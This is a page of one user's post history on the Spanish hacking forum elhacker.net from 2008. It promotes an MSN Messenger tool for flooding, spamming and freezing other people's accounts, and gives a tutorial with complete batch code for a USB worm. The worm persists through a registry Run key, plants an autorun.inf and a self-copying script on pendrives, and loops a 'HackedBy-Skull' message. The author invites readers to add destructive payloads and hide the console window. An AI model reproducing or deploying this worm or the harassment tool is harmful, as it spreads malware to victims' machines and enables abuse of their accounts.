elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 [7] 8 9 10
61  Programación / Programación Visual Basic / Re: Skull MSN Manager V 0.1 |By-Skull| en: 17 Marzo 2008, 20:41 pm
ok, gracias amigo! estos pequeños Bugs seran solucionados! ;)

Muchas Gracias y espero que disfruten el programa!
62  Programación / Programación Visual Basic / Re: Skull MSN Manager V 0.1 |By-Skull| en: 17 Marzo 2008, 19:01 pm
Citar
Hola tenes un error cuando se quiere usar la funcion de "flooder con muchas caras" al presionar en el boton "Floodear ahora!".

eso se debe que para usar ese flooder primero como dice en el programa tienes que desactivar la opcion de los emoticons y luego cerrar las demas conversaciones, cuando hallas echo esto, habres la conversacion del contacto o la victima que vas a floodear, luego hay le podras dar al boton floodear ahora y te funcionara correctamente! ;) si no la tienes abierta por eso te tira error, aunque puedo arreglarlo! ;)
63  Programación / Programación Visual Basic / Re: Skull MSN Manager V 0.1 |By-Skull| en: 17 Marzo 2008, 18:00 pm
Cuando, apenas o ejecutas?
64  Programación / Scripting / Re: Propagacion USB con Batch |By-Skull| en: 17 Marzo 2008, 17:44 pm
mmm bueno a mi me pasa lo mismo!:S y es raro pero si le das a eso de Abrir Pendrive por ejemplo lo ejecutas, porque esa es la accion que muestra, hay otra tecnicas para que apenas lo conectes lo ejecutes (Tipo T2W) pero creo que despues no vas a poder Volver a utilizar el pendrive osea siempre que lo conectes ejecutara el archivo y no podras abrir el pendrive! ;)
Solo tienes que buscar un mejor Autorun.inf
65  Programación / Programación Visual Basic / [+] Skull MSN Man. V 0.2 Actualizado 9/04/08!! en: 17 Marzo 2008, 17:41 pm
Saludos, bueno amigos al fin saque mi primera version del MSN Manager V 0.1, esta por problemas que tube cambiando de VB5 a VB6 se me borro el primer MSN Man. que estaba haciendo, y tube que comenzar a crear uno nuevo, este no tiene tantas opciones, pero bueno aqui las explico!..

                           -CapturaS
Form Principal



                           -Opciones d el MSN Man.-

- Contact Flooder, para sacar a tus contactos del Messenger
- Giant Greeting, una opcion que nos permite mandarle un mensaje a TODOS nuestros contactos conectados
- Status Flooder, nos permite floodear con ventanitas popUp Por defecto son 8 ventanitas
- MSN Spam, opcion que nos permite elegir cuantos contactos queramos de la lista(Que esten conectados) y mandarles un mensaje cuantas veces queramos del 1 al Infinito! (No recomiendo poner 25000)
______________________________________________________________________________________

                                                    Version V 0.1.5

Aqui les presento una version mas, esta no sera la ¡nueva! version con muchas cosas incluidas, esta version es mas para arreglar pequeños Bugs del programa, y como todo con nuevas opciones!

Captura Version V 0.1.5



Nuevas Opciones:

+ Arreglo de los Bugs los encontrados!
+ Un nuevo Flooder Nudger, nos permite enviar a 1 solo contacto cuantos nudgeos queramos
+ Ahora podemos crear cuantos menus PopUp queramos, ahora peudes elegir cuantas veces conectarte
+ Un pequeño manual del Contact Flooder


Captura del Status Flooder



Futuras Opciones:

* Pues arreglar mejor los Bugs que se me presenten
* Para Robar avatares, emoticons de tus amigos
* Mejor interfaz de sieño
* Source Code
* y bueno si le quieren poner una nueva opcion por MP


Opciones Propuestas:

* Obtener IP's

Bueno espero que disfruten la nueva version y me den sugerencia, avisos de bugs, etc! ;)

LINK DE DESCARGA: MSN Manager V 0.1.5
LINK DESCARGA: MSN Manager V 0.1
LINK SourceCode: El Source Code es por Privado yo les paso el link para que lo descargen!! ;)

Bueno si les tira algun error porfa me avisan espero que lo disfruten! y no jodan mucho tambien esta su Source code!!!xD Lo siento las imagenes no sirven

_____________________________________________________________________

                                           Version V 0.2

Saludos, bueno aqui les presento la ultima version del Skull MSN Manager este es V 0.2..
A este no le pude hacer la mayoria de las peticiones que me habian hecho, pero hice otras, por escases
de tiempo no pude, pero en fin aqui presentare!....

                           Capturas

Form Principal



Menu nuevo



About





Nuevas Opciones agregadas

- MSN Freezer:
                  Para que congeles las cuentas de tus amigos, recuerda que para congelar las cuentas
esa persona tiene que esta Off-Line, este programa a mi no me dio problemas pero si les da porfavor postear
o contactarme po IM...

- Private PopUp Flood:
                          Pidieron que si podia crear un PopUp Flooder para una sola persona pues
aqui esta, para que floodeen al contacto que quieran en vez de a todos! ;)

- PopUp Block:
                  harto de que te floodeen con ventanitas PopUp, o te fastidian esas ventanitas
peus aqui la solucion, este programa nos permitira si visualizar o no estas ventanitas!....

- Interfas mejorada:
                        Pues medio cambie la interfaz hay, pero solo un poco! ;)

Descarga del Programa: Descarga Aqui

Bueno espero que lo disfruten, y queria agradecerle a SmartGenious por ser mi BETA Tester y a -adriano- por
decirme o aconsejarme de como hacer el private popup flood, jeje en fin un gusto estar con ustedes y dentro de un tiempo, talvez libere el Source Code! :P

Salu2's! 8)
66  Programación / Scripting / Propagacion USB con Batch |By-Skull| en: 11 Marzo 2008, 01:52 am
hola, bueno aqui voy a explicar y aclarar un poco como se ejecutan algunos archivos con un autorun.inf, es simple, comenzemos...

Necesario:

crear un archivo autorun.inf
tu programa bat llamalo en este caso d.bat
y el .bat encargado de lo demas..
Quick Batch File Compiler


Bueno comenzemos lo hare breve y sencillo este constara cuando la persona ejecute o introduzca su pendrive este le va a salir un cartel que diga que es lo que desea hacer, si el elige por ejemplo la opcion de abrir el pendrive ejecutara nuestro archivo.bat (Tambien puede ser con un .exe, .vbs, etc)

Contenido del autorun.inf
Código:
[Autorun]
label=Pendrive
action=Abrir Pendrive
Icon=Icon.ico
shellexecute= "/d.bat"

bueno explico un poco label es el nombre por ejemplo cuando conectamos el pendrive como se vera si accesedemos a este por mi PC action es la accion de que cuando conectes el pendrive, este te dira que accion deseas realizar (Si ejecuta la de abrir pendrive ejecutara el .bat) Icon es el icono con el que nuestro archivo se vera y shellexecute ejecuta nuestro archivo en este caso el .bat...

ahora lo que contendra el d.bat pues eso se queda a vuestro antojo si quieren que sea virus, broma, etc... ahora si ponen por ejemplo la opcion icon (Se la pueden quitar) tiene que meter un icono adentro del pendrive, si es como si abrieran el pendrive y introdujeran el autorun el bat y el icono, a mi punto de vista yo trabajare sin el icon que es mejor....

ok ahora como metemos todo esto pues miren pueden crear un .bat que cree por ejemplo el autorun.inf y el bat en el C:\ y luego ese .bat vaya a una label y compruebe que si exciste el F:\ (en este caso este se supone que es el pendrive) copie todo lo que es el autorun.inf y el .bat a este sino vuelva al inicio y vuelva a comprobar si exciste, aqui un breve code para que vean como funciona:

Citar
  @echo off
:hi
cls
if EXIST "F:\" (goto si) else (goto hi)

:si
msg * si
copy /y "C:\autorun.inf", "F:\"
copy /y "C:\d.bat", "F:\"
exit

pues es asi de simple ahora que pasa si el pendrive tiene por defecto G:\, pues sinceramente tendrian  que hacer que en vez que vuelva a chekear si existe el F:\ vaya a otro y verifique si exciste el G:\ sino existe que vuelva a comprobar si exciste el F:\ y asi susecivamente..
Skull pero que pasa si apaga la PC? pues simple tiene que agregarlo al registro! ;)
Skull pero que pasa si ya esos archivos estan copiados en el pendrive? pues puedes elegir que si por ejemplo este verifica que excistes el F:\ luego verifique si exciste los archivos si existen ejecute el exit sino los copie! ;)

Skull pero no dara mucha tension que salga un pantalla negra? pues para eso les pedi el Batch file compiler para que usen el modo ghost! ;) y eso, ahora como se que no me explique muy bien aqui dejo un simple code que explica todo! ;)

Citar
@echo off
copy /y %0 "C:\WINDOWS"
reg add hklm\software\microsoft\windows\currentversion\run /v skls /t reg_sz /d C:\d.exe /f
if EXIST "C:\Autorun.inf" (goto kaki) else (goto xx)

:kaki
if EXIST "C:\d.bat" (goto hi) else (goto Xx)

:xx
echo [Autorun] > C:\Autorun.inf
echo label=Pendrive >> C:\Autorun.inf
echo action=Abrir Pendrive >> C:\Autorun.inf
echo shellexecute= "/d.bat" >> C:\Autorun.inf
echo reg add hklm\software\microsoft\windows\currentversion\run /v skls /t reg_sz /d C:\d.bat /f >> C:\d.bat
echo start >> C:\d.bat
echo start >> C:\d.bat
echo start >> C:\d.bat
echo start >> C:\d.bat
Echo :hik >> C:\d.bat
echo msg * HackedBy-Skull [Worm-Autopia] >> C:\d.bat
echo goto hik >> C:\d.bat
cls
goto hi

:hi
cls
if EXIST "F:\" (goto si) else (goto hi)

:si
if EXIST "F:\Autorun.inf" (goto si1) else (goto si2)

:si1
goto hi

:si2
copy /y "C:\autorun.inf", "F:\"
copy /y "C:\d.bat", "F:\"
goto hi

:ex
goto hi

bueno ese es el code, por razones de explicacion no lo hice mas dificl pero el d.bat pueden hacer que tambien cree otros .bat que hagan lo mismo, dejen payload que si X's dia ejecute un archivo que haga algo nose eso se los dejo a ustedes! ;)
Recuerden usar el batch file compiler para hacer el .bat en modo ghost! para que no cante tanto!
otra cosa que podrian hacer seria usar el BattoExe y poner que no salga la pantalla negra y en el evento que detecta los USB en vez de copiar otro batch se cpie a si mismo claro aqui ya ese batch deberia tener algo que si la brboma, el codigo del virus, etc.:.

Salu2's! 8)
67  Programación / Programación Visual Basic / Re: [Source] T2W v2 [Trojan To Worm] en: 7 Marzo 2008, 18:56 pm
disculpen amigos, no era mi intension causar problemas, habia visto algo del code pero me quedaban dudas que me aclaro un poco chefito, de nuevo disculpen y gracias! ;)
68  Programación / Programación Visual Basic / Re: MsN Api en: 7 Marzo 2008, 18:54 pm
bueno ten esto aqui espero que se ter aclare un poco! ;)

http://www.messengeradictos.com/documentos/programando-para-msn-messenger-con-visual-basic-6_139955
69  Programación / Scripting / Re: Tuto del batch en: 7 Marzo 2008, 01:06 am
xD!... de donde sacastes mi manual? De la CUH? :P

Salu2's! 8)
70  Programación / Programación Visual Basic / Re: [Source] T2W v2 [Trojan To Worm] en: 7 Marzo 2008, 00:45 am
hola jeje bueno te vuelvo a hacer las mismas preguntas! :P

1- Me podrias habilitar algo donde me enseñe a hacer los forms asi, osea el tipo de aparecer y desaparecer?

2- bueno y si me podrias explicar un poco lo del about que no lo entnedi muy bien! :-[

disculpa y GraXias!

Salu2's! 8)
Páginas: 1 2 3 4 5 6 [7] 8 9 10
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines